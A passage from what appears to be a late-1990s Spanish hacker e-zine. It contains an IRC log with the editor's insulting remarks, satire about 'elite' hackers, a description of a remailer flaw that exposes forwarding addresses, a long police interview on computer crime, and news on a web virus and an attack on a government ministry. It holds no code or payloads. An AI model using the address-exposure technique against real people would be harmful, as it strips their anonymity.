<MuErTe>   179  ?  S    0:00 ftpd: X.X.X.X: anonymous/anon@ana\010on.com: IDLE
<\W3nd|g0> ia hay grea
<MuErTe> mmm
<MuErTe> putos lamers!!

        [ si si ... pero yo ya tengo una cuenta mas para conectarme a Internet
         ... la reservare para hackear algun site y dejar tus huellas de
         redestb ... veremos quien es mas lamer ... ]

<\W3nd|g0> :o)
<MuErTe> yeske no los soporto kagondios!
- entra Atic (2HG@ctv21225130161.ctv.es4)
*** MuErTe sets mode: -o+b q1234 *!*?R?a?.?1@?9?.?6.?1.?9?
*** You were kicked by MuErTe (Banned forever!!!)
*** Attempting to rejoin...
Session Close: Mon Nov 23 01:47:17 1998

        [ que rapido me ha echado ... acaso tenia miedo? Uuuuuuuuh ... si en
          el fondo no es mas que un pedazo de mierda ... ]

        [ por cierto ... a ver si tienes cojones y nos quitas tambien la web
          a nosotros ... ]


NOTA IMPORTANTE !!!!!! se  supone que  Mierda (digo,  muerte)  no  leera  este
articulo porque el es 31337, al igual que algunos amigos suyos, pero hay otros
que  si lo  haran y que frecuentan el IRC. Quiero que quede claro que yo no he
provocado a  nadie para  que dijera nada en el canal. No me he hecho pasar por
nadie para ver  vuestra reaccion. Simplemente  puse un trozo  de log ... si os
molesta  leer vuestros propios comentarios, es como si os molestara miraros al
espejo ... Y otra cosa. yo tengo grandes amigos en el IRC (Nobody, Homs, Lobo,
wendigo,  ufo, arusha,  etc) y se que, afortunadamente, los gilipollas son una
minoria, pero los hay ... y el que quiera que se de por aludido.

REFLEXION: si leemos bien estos logs podemos llegar a la conclusion de que hay
dos  tipos  de  hackers,  la  31337  y  los  lamers,  que  paso  a describir a
continuacion:

1) Un hacker 31337 es aquel que cumple las siguientes caracteristicas:
        - Aprende a  escribir con 'k' en vez de 'c', 'z' en vez de 's' y sobre
          todo ... numeros que sustituyan las letras ...
        - Es op en algun canal de hack de IRC.
        - Tiene  un nick  original (CaseZero, MuErTe, SuperHacker, Cool, r00t)
        - Consigue  banear entre  10 y  20 newbies  diarios. (Los  lamers, que
          describire a continuacion, valen 5 puntos).
        - Debe  pertenecer a  algun grupo  organizado, por  supuesto,  con mas
          gente del canal (y que tambien sean op's) pero solo para hackear.
          Que  se jodan  los que no saben!!!  nada de  articulos (Mmmmm ... no
          sera que no tienen capacidad para escribir ninguno???)

2) Por el contrario, un indeseado lamer es aquel que:
        - Solo  entra en  el IRC  para chatear con los amigos (Arggggg ... que
          aburrido ... solo  chatean ... ni banean a nadie ni se pasan cuentas
          shell ...)
        - Escribe  articulos para  alguna ezine  (que lamer!!!  ayudando a los
          newbies!!! es  que no sabe que donde realmente se aprende es en IRC?
          ademas, a los newbies no hay que ensearles ... hay que banearles!!)
        - Hackea sus propias cuentas shell ... (eyy!!! para que??? si mi amigo
          _Fet1d0_  me  las  pasa  por  IRC!!!  para  que voy  a molestarme en
          conseguirlas  yo mismo?  asi  solo  tengo  que  entrar  cargado  con
          exploits (todos  los que pille por ahi ..) y probar a ver si me hago
          r00t).

Bueno, parece que esta claro, no?


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ N o t i c i a s ]

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

                          BUG EN REMAILERS

Hace  unas  semanas  Senpai  descubrio  un  bug   en  el  remailer   de  iname
(www.iname.com) en el que cualquier usuario puede  descubrir la direccion  del
forward a la que se redirigen los mails de un usuario.  Para ello el  servidor
a donde va redirigido el correo ha de estar 'down' o saturado.

Si enviamos un mail a HackerMan@iname.com (o cualquier otro dominio de iname),
y el mail debe redirigirse a federico@arrakis.es, si el servidor de arrakis se
encontrara  inoperativo al  recibir el  mail, iname  nos devolveria un mensaje
como  que no  encontro el  destino (al igual que hacen todos los servidores de
correo) pero con un pequeo fallo. En el mail nos vendria:
        'No se encontro la direccion federico@arrakis.es'
Con lo que ya sabriamos cual es el proveedor de ese usuario.

Una semana despues, PaTa descubrio el mismo bug en Bigfoot.

Y como buenos usuarios de iname y bigfoot que somos, ya hemos advertido  a los
administradores  para que  subsanen estos  problemas.  Segun  ellos  lo  estan
tratando. De todas maneras os explico como podeis 'protegeros' si usais  estos
remailers:

1) Si teneis un buzon anonimo (hotmail, axis, latinmail, etc) no hay problema.
Basta con  que cambieis  de buzon con algo de frecuencia. Pero tener en cuenta
que estos servidores gratuitos son los que mas suelen fallar, o sea  que tener
cuidado e ir cambiando de buzon con frecuencia.

2) Si  los mails  se redirigen  a los  buzones que  os  han asignado  vuestros
proveedores, esta claro que no quereis que nadie sepa si po canectais a traves
de arrakis, redesTB, o lo que sea. Bien, pues usar dos remailers. Por ejemplo:
        iname -> bigfoot -> arrakis

Eso es todo. Os informaremos cuando tengamos mas noticias.

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

                APPLE CONFIRMA EL BUG SHERLOCK EN MAC OS 8.5

Este bug  en el sistema  de busqueda del sistema operativo mas reciente de los
Mac (del  que informamos  en el  boletin anterior) acaba de ser reconocido por
Apple:

http://www.news.com/News/Item/0%2C4%2C28189%2C00.html?dd.ne.tx.fs4.1102

La empresa no se ha pronunciado aun sobre las denuncias efectuadas por algunos
usuarios acerca de otros posibles bugs que provocarian perdida de datos.

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

                (Articulo editado por el diario 'El Mundo')

   TENIENTE ANSELMO DEL MORAL, JEFE DEL GRUPO DE DELITOS INFORMATICOS DE LA
   GUARDIA CIVIL     "Los hackers son un poco autistas"

El Teniente Anselmo  del Moral  dirige el  brazo armado de la Benemerita en la
Red. Afable  y extrovertido, ha  cambiado la  pistola por un modem  y no lleva
tricornio cuando se sienta a navegar por Internet. Del Moral piensa que la Red
es  un lugar  que se  puede utilizar  para todo tipo de actividades: "Nosotros
solo estamos para investigar las delictivas".

OLALLA CERNUDA / PEDRO DE ALZAGA

DIARIO DEL NAVEGANTE.- Como y por que se decide crear la Unidad de Delitos
                       Informaticos?

TENIENTE DEL MORAL.- En 1990  se forma  la Unidad Central Operativa de Policia
                     Judicial de la Guardia  Civil, compuesta  por  diferentes
                     grupos de investigacion muy  especializados, que llevan a
                     cabo  una labor  de apoyo  al resto de las unidades de la
                     Guardia Civil en casos especeficos, como robo de obras de
                     arte,  delincuencia organizada,  delincuencia  economica,
                     etc.

                     En 1996 surge la necesidad de prestar tambien apoyo en la
                     investigacion  de   delitos   informaticos   o   de  alta
                     tecnologia. Sobre todo porque en el  Codigo Penal de 1995
                     aparecen  delitos que  pueden considerarse  informaticos,
                     bien  por los medios utilizados para su comision o por el
                     objeto del delito en si.

                     Por  aquel entonces yo pertenecia a un grupo encargado de
                     investigar delitos violentos y homicidios y habia cursado
                     estudios de analisis de gestion en informatica.

                     Mis superiores  me requirieron para formar el nuevo grupo
                     de investigacion. Hice una seleccion de personal y escogi
                     a tres  hombres para  la nueva  unidad. El siguiente paso
                     fue  el de formarnos en este nuevo campo y establecer una
                     metodologia de trabajo. Asistimos a diversos cursos, como
                     el que organizo el FBI en Nueva York, que nos permitieron
                     conocer  como se  estaba luchando  contra  este  tipo  de
                     delincuencia en otros paises.

DIARIO DEL NAVEGANTE.- Y cuando empiezan a trabajar?

TENIENTE DEL MORAL.- Finalizado  el periodo de formacion, se creo oficialmente
                     el  Grupo de  Delincuencia Informatica  y nuestro  primer
                     servicio  fue la  Operacion Toco,  en  marzo de  1997. Se
                     trataba  de la  entrada  ilegal  en  un  servidor  de  la
                     Universidad  de Tarragona. A partir de entonces, empiezan
                     a  recibirse denuncias  y casos  sobre los  que empezar a
                     trabajar.
                     Actualmente,  tenemos muchos  casos  abiertos e,  incluso
                     empezamos a estar desbordados. Ademas, estamos estudiando
                     el  cambio de  denominacion a  Grupo de  Investigacion de
                     Delitos  de Alta Tecnologia, pues ya no solo se presentan
                     delitos  informaticos,   sino  casos  de  fraude  en  las
                     telecomunicaciones - falsificacian  de   tarjetas  GSM -,
                     microprocesadores   remarcados,   etc.   Fraude   en  las
                     telecomunicaciones    o   fraude   electronico -  compras
                     realizadas a traves de Internet -.

DIARIO DEL NAVEGANTE.- Han recibido algun tipo de formacion especializada?

TENIENTE DEL MORAL.- Los  miembros  del  Grupo  ya  contabamos  con  formacion
                     procesal y penal -somos miembros de la Policia Judicial-,
                     pero estaba claro que necesitariamos preparacion tecnica.
                     Nos  pusimos  en  contacto  con   las   universidades  de
                     Tarragona  y  Politecnica  de  Catalu a y se organizaron
                     cursos  para  que  los  miembros  del   Grupo  recibieran
                     formacion intensiva en comunicaciones, Linux, analisis de
                     logs,  medios  de  almacenamiento  masivo,  encriptacion,
                     entre otras muchas cosas y de acuerdo a las denuncias que
                     se nos iban presentando.

DIARIO DEL NAVEGANTE.- Que tipo de denuncias recibe el Grupo?

TENIENTE DEL MORAL.- Normalmente  se trata  de delitos  recogidos en el Codigo
                     Penal  que se  refieren a  la revelacion  de  secretos  o
                     acceso  no autorizado a  sistemas informaticos, a daos a
                     sistemas informaticos  y a la copia ilegal de programas o
                     a falsificacion  de componentes. Incluso  el envio masivo
                     de correo electronico -lo que se conoce como SPAM-  puede
                     considerarse   un    uso    no    autorizado     de   las
                     telecomunicaciones.
                     En  cualquier caso, intentamos trabajar desde un punto de
                     vista  pragmatico, policial,  y no  entramos a valorar la
                     novedad  o antiguedad del delito, lo unico que sabemos es
                     que en todos  ellos existe una dificultad tecnica y sobre
                     ella trabajamos.

DIARIO DEL NAVEGANTE.- Quienes son los principales denunciantes en Espaa?

TENIENTE DEL MORAL.- Eso depende del tipo de delito. En los casos que nosotros
                     hemos  estudiado  mas  en  profundidad -sobre todo los de
                     entrada ilegal en un sistema o "hacking"- los principales
                     denunciantes  han   sido   proveedores   de   Internet  y
                     Universidades.
                     Tambien  tenemos conocimiento de accesos no autorizados a
                     instituciones  del  pais e incluso a entidades bancarias,
                     pero estos  casos no han sido denunciados. Lo sabemos por
                     la  confesion de alguno  de los "hackers"  detenidos, que
                     han declarado saber entrar en estos sistemas.

DIARIO DEL NAVEGANTE.- Y  el Grupo puede  actuar sin que  haya una denuncia de
                       alguna persona afectada?

TENIENTE DEL MORAL.- Si,  se  puede  actuar  cuando  el  delito  afecta  a una
                     pluralidad  de  personas, como  indica  el  Codigo Penal.
                     Cuando  hay muchas  personas  afectadas no hace falta una
                     denuncia para poder actuar, como, por ejemplo, el caso de
                     un  banco aleman al que este verano robaron las claves de
                     sus  clientes y  les chantajearon  con hacerlas publicas.
                     Aunque  el  banco  no  denuncio  el  caso  por  temor  al
                     desprestigio  la  policia  actuo por  que  afectaba a  un
                     colectivo muy grande. En Espaa sucederia lo mismo.

DIARIO DEL NAVEGANTE.- Nos  podria contar  algun caso de los que han resulelto
                       favorablemente?

TENIENTE DEL MORAL.- Uno  de  los  casos  de  coordinacion  entre  comunidades
                     autonomas fue en Sevilla. Un proveedor de Internet estaba
                     boicoteando, mediante  ordenadores, a un competidor, para
                     quitarle su  clientela. El  proveedor contrato a un joven
                     que  sabia  manejar un  programa  denominado "tear drop",
                     capaz   de  lanzar  paquetes  cada  diez  minutos  a  una
                     determinada  direccion  y,  por  tanto,  dificultando  el
                     funcionamiento  de  un  sistema.  Ademas,  el programador
                     habia disfrazado la direccion de origen de  los paquetes,
                     sustituyendola  por  una  perteneciente  a  la   red  del
                     proveedor  atacado.  Para este,  el ataque provenia de su
                     propio sistema.
                     Al mismo  tiempo que el programa atacaba, en los momentos
                     de  mayor conexion,  el  gerente de  la  empresa atacante
                     llevaba  a cabo  una  captacion de  los  clientes  de  su
                     competidor, que, logicamente, estaban descontentos con el
                     servicio.
                     Este  caso  pudimos   resolverlo  por   la  vanidad   del
                     programador. Se considero tan bueno que lo fue contando a
                     muchas  personas. Nosotros recogimos esas manifestaciones
                     hasta conseguir el  permiso para registrar su casa y alli
                     descubrimos el programa "tear drop" en sus ordenadores.

DIARIO DEL NAVEGANTE.- La BSA ha presentado denuncias?

TENIENTE DEL MORAL.- La BSA ha trabajado con nosotros en casos de copia ilegal
                     de  programas.  Ahora  mismo  recuerdo  una  operacion en
                     Sevilla  en la que se intervinieron 9.800 CD.  Pero estos
                     son  servicios  que  no  requieren  una  gran preparacion
                     tecnica y  cualquier  unidad de  la  Guardia Civil podria
                     llevarlos  a cabo.  El  GDI suele  actuar  cuando hay una
                     organizacion,  un  montante   economico  elevado,  varias
                     comunidades autonomas implicadas o es necesario coordinar
                     acciones con el extranjero. En otros casos, nuestra labor
                     se  reduce  a  dirigir la informacion a nuestras unidades
                     territoriales.

DIARIO DEL NAVEGANTE.- Han recibido denuncias de bombardeo de correo?

TENIENTE DEL MORAL.- Si,  pero todavia  ninguna se ha formalizado. Mucha gente
                     nos ha  contado que desde una cuenta de correo se les han
                     enviado  miles de  mensajes de correo electronico. Lo que
                     dice  el Codigo Penal  al respecto es que tiene que haber
                     un  perjuicio,  pero  cuando  el  denunciante  se  pone a
                     valorarlo  no  lo hace en cuanto a las horas que tarda un
                     tecnico  en arreglarlo,  o el  coste que ha supuesto a la
                     empresa  tener el  sistema apagado.  Todo esto  tiene que
                     superar las 50.000 pesetas para que se considere delito.

DIARIO DEL NAVEGANTE.- Que validez tiene un "log" como prueba?

TENIENTE DEL MORAL.- En el Codigo Penal de 1995 no hay jurisprudencia sobre el
                     uso  de logs.  La mayoria  de los  casos en los que se ha
                     aportado un  log como prueba estan todavia a la espera de
                     juicio. Asi  que, para  ser justos, no sabemos la validez
                     puedan tener.
                     Cuando  vamos a,  pongamos por caso, un proveedor, el nos
                     entrega una copia impresa del log, que nosotros cotejamos
                     con  lo  registrado en la  maquina. Es cierto que los log
                     pueden ser objeto de manipulacion, pero  hasta el momento
                     no hemos encontrado ningun caso de denuncia falsa.
                     Nosotros  sabemos analizar  un log e interpretarlo, pero,
                     ademas,  siempre contamos  con la  ayuda de  expertos. El
                     procedimiento  habitual consiste  en  enviar  el  log  al
                     centro   de   Coordinacion   de   Emergencias   de  Redes
                     Telematicas  (CERT),  un  centro  publico  de  reconocido
                     prestigio  nacional e  internacional.  Ellos  nos remiten
                     informes tecnicos que recogen lo que se ha detectado y se
                     adjuntan  a las  diligencias. El criterio del CERT nos da
                     la  seguridad  de  no  equivocarnos  en   cuanto   a  las
                     conclusiones que hemos extraido.
                     Por  su parte,  los jueces estan aceptando estos informes
                     como pruebas documentales, una evidencia documental de lo
                     que  ha pasado.  El  hecho de  que  durante el proceso se
                     demuestre  que el  log  ha sido manipulado provocaria una
                     situacion  parecida a  la de  otros tantos juicios en los
                     que se alega falsedad documental o de cualquier otro tipo
                     de  actividad. En  el  caso  de  delincuencia  economica,
                     cuando  alguien denuncia  una estafa y presenta un papel,
                     una  factura o un recibo,  en definitiva esta presentando
                     un  objeto que tambien es manipulable. Pero, al final, la
                     manipulacion  es  un  delito  y   si   se   descubre,  el
                     perjudicado sera el.
                     Repito  que,  hasta  el  momento,  lo que se ha detectado
                     corresponde exactamente con lo denunciado. Esto no quiere
                     decir  que  en el futuro no nos intenten engaar, pero el
                     filtro  que hacemos es una verificacion por nuestra parte
                     y por la de expertos.

DIARIO DEL NAVEGANTE.- Como es el perfil del delincuente informatico espaol?

TENIENTE DEL MORAL.- Segun los casos que hemos llevado, podriamos clasificar a
                     los delincuentes informaticos en tres grupos.
                     El  primero, el grupo de los "hackers", estaria compuesto
                     por  jovenes varones,  de entre  17 y  30 aos,  con gran
                     capacidad y conocimientos tecnicos. Gente que en su mundo
                     son verdaderos genios - su trabajo nos ha impresionado en
                     muchas ocasiones-, pero a veces un poco "autistas", si se
                     me permite la expresion.
                     Frecuentan  universidades o  cibercafes, utilizan  el IRC
                     como  medio  para  intercambiar  conocimientos  y  forman
                     grupos. A nosotros nos ha impresionado lo organizados que
                     pueden  llegar  a  ser -tienen  sus  propias  reglas, sus
                     sistemas  de  encriptacion-. Si  esas reglas y metodos de
                     trabajo  se extrapolasen  a otros  grupos de delincuencia
                     seria  un verdadero  problema.  La mayor  parte  de ellos
                     cometen  los delitos  como un  reto  intelectual, pero el
                     resto  sabe  perfectamente  que  lo  que esta haciendo es
                     delictivo. Esta minoria suele actuar como lider y hay una
                     gran mayoria que se siente atraida por ellos.
                     Los casos que hasta ahora hemos tenido en Espaa quiza no
                     son de  una gravedad maxima, pero el conocimiento tecnico
                     de  estas  personas podria  llegar  a  ser peligroso. Por
                     poner  un ejemplo,  nosotros  hemos  detectado  casos  de
                     intrusion en el sistema informatico del aeropuerto.

                     El  segundo grupo  lo formarian las redes de delincuencia
                     organizada, distribucion a traves de Internet o grupos de
                     copia  ilegal de  programas, que  suelen estar compuestos
                     por  personas que  trabajan en tiendas de informatica. Lo
                     verdaderamente  curioso es  que hay gente que puede vivir
                     exclusivamente  de esto,  pues hemos detectado algun caso
                     en el  que las  ganancias llegaban  a ser de un millon de
                     pesetas  diario.  Son  gente  mas  mayor  y  su  labor no
                     requiere conocimientos tecnicos elevados.

                     El  tercer  grupo,  referido  al  fraude  en   equipos  y
                     componentes,  esta  compuesto  por  grandes  empresas  en
                     Espa a -cuatro  o cinco-  que se  dedican a importar del
                     sudeste asiatico - Hong Kong, Vietnam, Taiwan- y de EEUU-
                     Miami-   mediante    barcos    e,     incluso,   aviones,
                     microprocesadores    remarcados     para   posteriormente
                     distribuirlos  en  unas  200   empresas  del   territorio
                     nacional. Estas compaias venden ordenadores clonicos muy
                     baratos  y saben  perfectamente que los microprocesadores
                     que estan  vendiendo son falsos, remarcados. Al final, el
                     defraudado es el consumidor de la calle, el ciudadano.

                     En  este  grupo  hemos encontrado  empresas que empezaron
                     hace cinco aos con un capital de 5 millones de pesetas y,
                     hoy en dia, facturan 1.200 millones.

DIARIO DEL NAVEGANTE.- Como  se puede  actuar contra delitos fuera de nuestras
                       fronteras?

TENIENTE DEL MORAL.- Nosotros  asistimos a muchas conferencias internacionales
                     y estamos en contacto con las policias de otro paises, de
                     Estados Unidos, Alemania, Inglaterra, etc. Desde  nuestra
                     fundacion  hemos sido  invitados  a participar  en  foros
                     internacionales.  El primero  de ellos fue en Nueva York,
                     en el que nos invitaron a participar en la reunion que se
                     celebra  en  la  secretaria  general de Interpol, en Lyon
                     (Francia). De alli salio un grupo de trabajo  de expertos
                     policiales  de ocho  paises, entre  ellos el nuestro, que
                     nos reunimos cada tres meses, para exponer nuestros casos,
                     los  modus operandi,  etc. Hemos podido comprobar que los
                     delitos y las formas de actuacion practicamente coinciden
                     en  todos los  paises: el remarcado de microprocesadores,
                     el hacking, etc.
                     De  esta cooperacion  han salido procedimientos conjuntos
                     para  que nos  podamos  comunicar los  datos  de los logs
                     rapidamente  y podamos  identificar a una persona, aunque
                     utilice otro pais como puente para atacar un sistema.
                     Tambien estamos  involucrados en otros proyectos, como el
                     desarrollo de cursos de Interpol, en los que participamos
                     como  ponentes, para  paises del  este de Europa. Ademas,
                     tenemos buenos  contactos con casi todas las policias del
                     mundo, y colaboramos en estos temas.
                     Y no solo pertenecemos a la Interpol, sino que estamos en
                     contacto  con otras  organizaciones internacionales, como
                     la IOCE (International Organization of Computer Evidence),
                     formada  por empresas  especializadas en  el sector de la
                     informatica y  que pueden ayudarnos a conocer y reconocer
                     evidencias  en  ordenadores.   Hay  empresas  que  venden
                     programas  para "reventar"  ficheros  encriptados  o para
                     interceptar  correo  electronico.  En   estos  congresos,
                     coincidimos  con  estas empresas y con gente del mundo de
                     la  lucha contra  la delincuencia informatica, y agencias
                     de inteligencia, como la CIA o el Mossad.
                     Otra  reunion a  la  que  vamos  con frecuencia  es la de
                     laboratorios  forenses,  para  que  podamos  utilizar los
                     distintos  laboratorios  de Europa  por si necesitamos su
                     colaboracion o ellos la nuestra.
                     El  resultado es  que  ahora mismo  estamos trabajando en
                     casos  con el  FBI,  Scotland Yard,  la  policia sueca...
                     Porque  es  muy  habitual  que  se   realicen  conexiones
                     intermedias  desde   maquinas   de   otros   paises  poco
                     protegidos  que  se  utilizan como  puente para atacar en
                     Espaa. Las  pruebas deben  incorporarse al procedimiento
                     espaol  pero  pidiendo  comisiones  rogatorias  a  otros
                     paises.
                     Cuando  todo se produce en Espaa es relativamente rapido
                     dar con  los delincuentes, solo  hay que  seguir la pista
                     hacia  atras de  las conexiones. Pero  cuando hay un pais
                     intermedio,  como en  el  caso de  Hispahack, que operaba
                     desde Gibraltar, el proceso es mucho mas lento. Debido  a
                     los problemas burocraticos, las extradiciones de personas
                     que han cometido delitos en otros paises son muy lentas.

DIARIO DEL NAVEGANTE.- Donde  termina la  libertad de  expresion y comienza el
                       delito?

TENIENTE DEL MORAL.- Nosotros actuamos  siempre de  acuerdo al Codigo Penal, y
                     tras la denuncia de una persona afectada. En el Codigo se
                     define claramente el delito de apologia, y si encontramos
                     una pagina web que segun al ley esta realizando apologia,
                     podriamos actuar. Pero hasta ahora no hemos encontrado en
                     Internet grupos  de este  tipo, o,  mejor dicho,  si  los
                     hemos encontrado, pero en otros paises.

DIARIO DEL NAVEGANTE.- Que  hay  de  cierto  en  lo  que  se  cuenta  sobre la
                       pornografia infantil en la Red?

TENIENTE DEL MORAL.- En Espaa este tema no esta regulado como en otros paises.
                     Aqui  se  considera  delito  la   difusion   de  imagenes
                     pornograficas  entre menores de edad, pero en Internet no
                     se  puede saber  cuantos menores de edad estan viendo una
                     fotografia de este tipo. Lo que si es delito es someter a
                     un menor  a practicas pornograficas. Si nosotros a traves
                     de las fotos llegamos al lugar donde se han realizado y a
                     la  persona que  lo hace,  se  le  detiene. Pero que haya
                     proveedores  de Internet  que se dedican a coger fotos de
                     la Red y colocarlas en sus paginas no es delito. En otros
                     paises la difusion de este tipo de imagenes esta regulada,
                     pero ademas tienen gente constantemente oteando la Red en
                     busca de  estas fotos. Eso es un trabajo impresionante de
                     tiempo  y trabajo.  Pero nosotros, por la legislacion que
                     hay en Espaa, aunque lo encontrasemos no podriamos hacer
                     nada.

DIARIO DEL NAVEGANTE.- El comercio electronico en Espaa es seguro?

TENIENTE DEL MORAL.- El comercio electronico en bancos y grandes instituciones
                     es muy seguro. Todos ellos estan utilizando protocolos de
                     seguridad  muy fiables,  sistemas criptograficos para las
                     transacciones  economicas. Desde  ese  punto de  vista si
                     podemos afirmar que el comercio electronico es seguro.
                     Ahora  bien,  estamos   recibiendo  muchas  denuncias  de
                     empresas  que  montan una  cibertienda y solo piden a sus
                     clientes los datos de la VISA y la fecha de caducidad  de
                     la  misma. No  saben  que en  Internet pueden encontrarse
                     programas  capaces  de  generar  numeros  de  VISA  y sus
                     respectivas  fechas  de  caducidad  y utilizarlos despues
                     fraudulentamente.
                     Estamos  recibiendo un  aluvion de denuncias por parte de
                     esas pequeas empresas.

DIARIO DEL NAVEGANTE.- Como les afectara el uso de la criptografia privada, la
                       particular?

TENIENTE DEL MORAL.- En  Internet  hay  una  serie de  riesgos  y una serie de
                     oportunidades. En cuanto a la legislacion, hay paises muy
                     prohibitivos, como Francia, donde esta prohibido el envio
                     de  mensajes de  forma  encriptada, y  solo se permite un
                     cierto grado de encriptacion pero tiene que ser declarado
                     a una especie de agencia de proteccion de datos.
                     Los  americanos tambien  tienen  algo parecido.  En otros
                     paises  el desarrollo y uso de la encriptacion es libre o
                     no esta regulado, como ocurre en Espaa.
                     Y  en  cuanto a  riesgos  de la  encriptacion, el uso por
                     parte  de  delincuentes  ya  ocurre  en  Espaa.  Se  han
                     utilizado  comunicaciones encriptadas por parte de grupos
                     organizados.  Pero tambien  esto tiene muchas utilidades,
                     sobre todo para el comercio electronico, ya que su futuro
                     pasa por la encriptacion.

DIARIO DEL NAVEGANTE.- Que le parecen las movilizaciones que se estan llevando
                       a cabo en Espaa para que se implante la tarifa plana?

TENIENTE DEL MORAL.- Ante  esto  nos  mantenemos  al  margen,  porque nosotros
                     entramos  a la  Red  a trabajar,  no podemos ocuparnos de
                     otras  cosas. Cada  pais  tiene  su  problematica  y  sus
                     historias. Es cierto que parece que en Espaa las tarifas
                     son algo  mas caras que en Europa, pero tambien es cierto
                     que aqui hay  muchisimos mas  proveedores  que  en  otros
                     paises.
                     Nosotros  nos mantenemos  al  margen porque  no  creo que
                     tengamos que decir nada sobre esto.

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

                         NUEVO VIRUS DE WEB
 
Se acaba  de anunciar  el descubrimiento  de un  nuevo virus basado en web que
puede  entrar en  los  ordenadores de  los  usuarios simplemente visitando una
pagina  web.  El  virus,  denominado  HTML.Internal  por  el  distribuidor  de
antivirus  que lo  descubrio,  no produce  ningun  dano, pero segun la empresa
podria  ocasionar algun  problema.  El peligro  lo  tienen principalmente  los
usuarios  de Explorer e Internet  Information Server, de Microsoft. Si se esta
usando  Netscape u otro navegador, no hay ningun peligro. La forma de contagio
es  visitando una  pagina web  con el  virus en  el servidor, el cual hace una
llamada al  lenguaje de  scripts de Visual Basic para realizar una busqueda en
los discos duros  locales de  archivos con extensiones .HTM o .HTML. Al cargar
una  pagina infectada,  el  mensaje superior  es "HTML.Prepend /1nternal."  La
forma de  evitar el contagio es  manteniendo la seguridad de Internet Explorer
al menos en  nivel Medio, ya que avisara a los usuarios que HTML.Internal esta
buscando en los discos duros.
 
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

           (Articulo extraido del diario 'El Pais Digital')

       UNA JUEZ PIDE APOYO AL FBI PARA INVESTIGAR UN ATAQUE INFORMATICO
       CONTRA EL MINISTERIO DEL INTERIOR (EN ESPAA)

Los  piratas, presumiblemente  espaoles, actuaron a traves de California para
ocultarse. La  titular  del  juzgado de  Instruccion numero  ocho  de  Madrid,
Rosario  Espinosa, ha  pedido apoyo  a la Oficina  Federal de Investigacion de
Estados  Unidos  (FBI)  para  identificar   a  quienes   atacaron  el  sistema
informatico  del Ministerio del  Interior entre  los dias 6  y 11 de junio. El
ataque  se efectuo  desde  ordenadores de  la  empresa Hotmail,  con  sede  en
California, que  facilita una direccion de correo electronico sin comprobar la
identidad  del cliente. Los piratas informaticos cometieron un presunto delito
de revelacion de secretos, segun fuentes proximas a la investigacion.

La  juez ha  dirigido  una comision  rogatoria  internacional al  FBI para que
recabe  de la empresa Hotmail  los datos necesarios para intentar identificar,
lo que resulta muy  dificil, a los hackers (piratas informaticos) que atacaron
los ordenadores del Ministerio del Interior.

Los  hackers  accedieron  a  datos  de  caracter  reservado,  por  lo  que las
diligencias  previas se  han  abierto por  un presunto delito de revelacion de
secretos, que el  articulo 197 del Codigo Penal castiga con penas de entre uno
y  cuatro aos  de prision. La  investigacion judicial apunta  a una  presunta
apropiacion o incluso modificacion de ficheros informaticos del Ministerio del
Interior.

Hotmail Corporation,  recientemente adquirida  por Microsoft, la firma de Bill
Gates, es  la principal suministradora mundial de cuentas  gratuitas de correo
electronico, con  unos 10 millones de usuarios. Utilizan sus servicios quienes
no quieren pagarse una cuenta de correo o desean guardar el anonimato, pues la
compaia  facilita a  sus clientes la posibilidad  de dotarse de una direccion
electronica  nueva sin verificar  la autenticidad de los  datos personales que
aportan.

En  su  pagina de  presentacion  en Internet,  Hotmail  asegura que  sigue  la
politica  de  "respetar  la  privacidad  de  sus   socios,  excepto   si  debe
quebrantarla  por  imperativos  legales",  y  que  la empresa  no se considera
responsable "de cualquier dato que resulte, directa o indirectamente, del uso"
de sus servicios.

Los  ordenadores de  Interior  solo registraron  la  direccion facilitada  por
Hotmail  al pirata  informatico, el  equivalente a  un apartado de correos. El
hecho  de que el  ataque se  lanzase desde Estados Unidos  no significa que su
autor sea  un residente en dicho pais. Mas bien se sospecha que el origen esta
en  Espaa y que  el ordenador norteamericano  sirvio de  paso intermedio para
borrar huellas.

Con el objetivo de identificar al agresor, la juez ha pedido al FBI el fichero
LOGS en  el que se registran las conexiones realizadas durante los dias en que
se produjo el  ataque con el ordenador de Hotmail donde esta ubicado el correo
electronico  que empleo  el hacker, asi como los numeros IP correspondientes a
dichas conexiones.
Son los dos  rastros informaticos a partir de los cuales es posible, con mucha
paciencia y un poco de suerte, ir tirando del hilo y llegar hasta el agresor.

El  fichero LOGS permitira  conocer  las operaciones  realizadas  desde  dicho
correo  electronico y  los numeros IP  llevaran hasta  el servidor de acceso a
Internet  utilizado por  el  pirata informatico.  Aunque  el usuario  no tiene
siempre  el mismo  numero IP,  la empresa suministradora de  acceso a Internet
puede localizar que cliente utilizo un numero a una hora concreta.

El  siguiente paso de  la  investigacion consistira,  por tanto,  en saber que
usuario de  Internet empleo dicho  numero IP durante la madrugada del sabado 6
de  junio, cuando  el ataque  informatico contra  Interior alcanzo  su  maxima
intensidad.

En Estados Unidos, la  pirateria informatica constituye una de las principales
preocupaciones de la Administracion y de muchas empresas. Las ordenadores  del
Pentagono, objetivo preferente de los hackers, sufren unos 250.000 intentos de
ataque  cada ao  y su portavoz tuvo que  reconocer recientemente que un grupo
internacional  de  piratas  habia  logrado  introducirse  en  el   sistema  de
telecomunicaciones de la Defensa.

En  Espaa  hay menos precedentes  ya que, hasta ahora, la investigacion se ha
centrado en perseguir la  venta de copias ilegales  de programas. Sin embargo,
